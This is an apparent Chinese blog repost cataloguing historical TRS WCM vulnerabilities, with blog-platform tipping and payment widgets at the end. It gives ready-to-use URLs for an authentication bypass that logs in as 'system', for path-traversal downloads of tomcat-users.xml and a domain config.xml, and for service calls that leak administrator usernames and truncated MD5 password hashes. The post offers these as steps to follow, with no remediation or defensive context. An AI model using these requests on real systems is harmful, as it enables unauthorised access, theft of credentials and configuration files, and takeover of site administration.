TRS的WCM历史漏洞

一、绕过密码登录

1访问网站的登录页

看到TRS WCM知道为北京拓尔思开发的一个平台,这个平台是存在相关漏洞的
在这里插入图片描述

2 在网址后面添加查看管理员密码的链接

wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin

在这里插入图片描述

3在地址栏中输入xxx:8080/wcm/app/login.jsp回车即可成功登录,且账号为system

在这里插入图片描述

二、任意文件下载漏洞

漏洞1:

漏洞存在于wcm/app/sysrem/read_image.jsp?Filename=…/…/tomcat/conf/tomcat-users.xml
此漏洞需要在登录后才能进行验证
在这里插入图片描述

漏洞2

http://xx.xx.xx.xx:8080/wcm/file/read_file.jsp?FileName=U020120628383491551127/…/…/…/…/…/Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx
在这里插入图片描述

三、用户密码泄露

TRS WCM6.0以上版本某个功能页面调用service限制不严格,可以获取后台管理用户的用户名和密码序列
访问链接 http://xx.xx.xx.xx:8080/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers
加密方式是:常规32位的MD5取前15位
在这里插入图片描述

https://github.com/Pa55w0rd/pa55w0rd.github.io.old/blob/3f6ed5092d35bb5bc3884aa8fe9d6aab8d88cf03/_posts/2018-11-08-trs.md
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值